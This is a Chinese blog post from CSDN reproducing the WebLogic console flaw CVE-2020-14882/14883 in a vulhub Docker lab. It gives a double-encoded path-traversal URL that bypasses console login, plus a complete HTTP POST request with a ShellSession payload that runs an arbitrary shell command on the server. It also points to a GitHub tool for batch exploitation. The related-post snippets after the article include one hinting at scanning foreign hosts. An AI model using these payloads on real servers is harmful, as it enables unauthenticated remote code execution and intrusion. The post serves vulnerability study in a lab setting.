Oracle WebLogic Server 安全漏洞(CVE-2020-14882)复现

已于 2024-07-05 14:47:26 修改
阅读量837 收藏 19
点赞数 10
文章标签: 服务器 运维
于 2024-07-05 14:45:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77132421/article/details/140201593
版权

一、漏洞概述

攻击者可通过构造特殊的 HTTP GET 请求,结合 CVE-2020-14883 漏洞进行利用,利用此漏洞可在未经身份验证的情况下直接接管 WebLogic Server Console ,并执行任意代码。

二、影响范围

Oracle Weblogic Server 10.3.6.0.0
Oracle Weblogic Server 12.1.3.0.0
Oracle Weblogic Server 12.2.1.3.0
Oracle Weblogic Server 12.2.1.4.0
Oracle Weblogic Server 14.1.1.0.0

三、环境搭建

进入漏洞路径:/vulhub/weblogic/CVE-2020-14882

创建并后台运行所有容器:docker-compose up -d

显示所有容器:docker-compose ps

显示环境端口为7001端口

访问:http://127.0.0.1:7001/console

环境搭建成功

四、漏洞复现

构造POC:

http://127.0.0.1:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29

发现可直接进入后台

抓包写入POC

POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1
Host: 127.0.0.1:7001
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 138

_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/123.txt');")
 

使用脚本工具:CVE-2020-14882_ALL.py

CVE-2020-14882_ALL/CVE-2020-14882_ALL.py at master · GGyao/CVE-2020-14882_ALL · GitHubCVE-2020-14882_ALL综合利用工具,支持命令回显检测、批量命令回显、外置xml无回显命令执行等功能。 - CVE-2020-14882_ALL/CVE-2020-14882_ALL.py at master · GGyao/CVE-2020-14882_ALLicon-default.png?t=N7T8https://github.com/GGyao/CVE-2020-14882_ALL/blob/master/CVE-2020-14882_ALL.py修改脚本内容:

利用:

利用成功。

小龙0
关注
  • 10
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2020-14882 WebLogic远程代码执行漏洞复现
千寻的博客
12-17 1万+
Weblogic简介 WebLogic Server是美国Oracle公司的主要产品之一,其主要用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用,是商业市场上主要的Java(J2EE)应用服务器软件之一。 漏洞描述 2020年10月28日,Oracle发布的10月安全更新中的Oracle WebLogic Server 远程代码执行漏洞CVE-2020-14882)POC被公开,远程攻击者可以通过发送恶意的HTTP GET 请求。成功利用此漏洞的攻击者可在未经身份验证的情况下控制 We
复现nuclei——CVE-2020-14882WebLogic远程代码执行漏洞
记录并分享学习安全的知识点..
01-21 2053
一、漏洞介绍 2020年10月28日,Oracle发布的10月安全更新中的Oracle WebLogic Server 远程代码执行漏洞CVE-2020-14882)POC被公开,远程攻击者可以通过发送恶意的HTTP GET 请求。成功利用此漏洞的攻击者可在未经身份验证的情况下控制 WebLogic Server Console ,并执行任意代码。 二、影响版本 WebLogic 10.3.6.0.0 WebLogic 12.1.3.0.0 WebLogic 12.2.1.3.0 WebLo
WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)
qq_50854662的博客
02-28 1280
WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)
Weblogic 管理控制台未授权远程命令执行漏洞CVE-2020-14882CVE-2020-14883)
m0_68045701的博客
07-10 1981
2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882CVE-2020-14883。CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。首先,我们需要构造一个XML文件,并将其保存在Weblogic可以访问到的服务器上,如。访问后台后是一个低权限的用户,无法安装应用,也无法直接执行任意代码。
漏洞复现Weblogic未授权命令执行漏洞CVE-2020-14882
weixin_43486390的博客
12-17 2170
CVE-2020-14882
CVE-2020-14882&14883漏洞复现
m0_52089634的博客
01-03 1573
CVE漏洞复现
weblogic未授权访问漏洞复现CVE-2020-14882
Armandhe的博客
06-07 5284
有了它,你知道怎么上fofa上搜搜搞搞小日本了吧
servlet 脚本不执行_Weblogic Console HTTP协议远程代码执行漏洞复现CVE202014882
weixin_39745933的博客
12-11 413
0x01 漏洞描述近日,Oracle WebLogic Server 远程代码执行漏洞 (CVE-2020-14882)POC 被公开,未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。它们均存在于WebLogic的Console控制台组件中。此组件为WebLogic全版本默认自带组件,且该漏洞通过HT...
vulhub中Weblogic 管理控制台未授权远程命令执行漏洞复现CVE-2020-14882CVE-2020-14883)
yougexiaojiuguan的博客
03-10 716
漏洞复现过程的记录
Oracle WebLogic Server远程代码执行漏洞 CVE-2020-14750 已亲自复现_cve-2020-14750漏洞复现
2401_83739434的博客
04-03 2518
环境启动后,访问http://192.168.63.129:7001/console/login/LoginForm.jsp,说明已成功启动。
CVE-2020-14882 | Weblogic未授权命令执行漏洞复现
AzVoidSUN的博客
11-04 1361
环境安装 首先电脑已安装好的jdk \bin目录下 然后java -jar 执行你的jar包就可以了 Oracle WebLogic Server版本:10.3.6.0,12.1.3.0,12.2.1.3,12.2.1.4,14.1.1.0。均存在此漏洞。 构造poc ,未授权访问后台地址http://127.0.0.1:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsCo
weblogic——CVE_2020_14882
qq_17622203的博客
03-21 5247
影响版本 Oracle Weblogic Server 10.3.6.0.0Oracle Weblogic Server 12.1.3.0.0Oracle Weblogic Server 12.2.1.3.0Oracle Weblogic Server 12.2.1.4.0Oracle Weblogic Server 14.1.1.0.0 转自:weblogic 未授权命令执行漏洞CVE-2020-14882,CVE-2020-14883)复现 - My_Dreams - 博客园 vulfocus开
Weblogic 管理控制台未授权远程命令执行漏洞CVE-2020-14882CVE-2020-14883)漏洞复现
weixin_48413667的博客
09-22 8088
一、软件介绍 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 二、漏洞描述 在2020年10月的更新中,Oracle官方修复了两个安全漏洞,分别是CVE-2020-14882CVE-2020-14883
Weblogic漏洞复现之远程代码执行(CVE-2020-14882
最新发布
hhsjjsj的博客
08-07 572
全称为Oracle WebLogic Server,是基于JavaEE服务器的中间件。
Weblogic Console远程代码执行漏洞(CVE-2020-14882)
Li-D的博客
06-04 7074
漏洞描述 2020年10月30日, Oracle 官方的 CVE-2020-14882 Weblogic 代码执行漏洞最新补丁可被绕过,该漏洞编号为 CVE-2020-14882。远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console ,并在 WebLogic ServerConsole 执行任意代码。 影响版本 Oracle WeblogicServer 10.3.6.0.0 Oracle WeblogicServer 12.1.3.0
CVE-2020-14882【vulhub weblogic漏洞复现
weixin_65722679的博客
07-04 265
CVE-2020-14882【vulhub weblogic漏洞复现
【Vulhub漏洞复现Weblogic(CVE-2020-14882)漏洞复现
一剑开天门!的博客
02-22 1742
【Vulhub漏洞复现Weblogic(CVE-2020-14882)漏洞复现
CVE-2020-14882weblogic 未授权命令执行漏洞验证及修复
weixin_38896449的博客
12-02 3722
weblogic 未授权命令执行漏洞CVE-2020-148821.漏洞描述2.影响版本3.漏洞检测4.漏洞修复 1.漏洞描述 在Oracle官方发布的2020年10月关键补丁更新公告CPU(Critical Patch Update)中,包含一个存在于Weblogic Console中的高危远程代码执行漏洞CVE-2020-14882。未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。 2.影响版本 Oracle Web
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值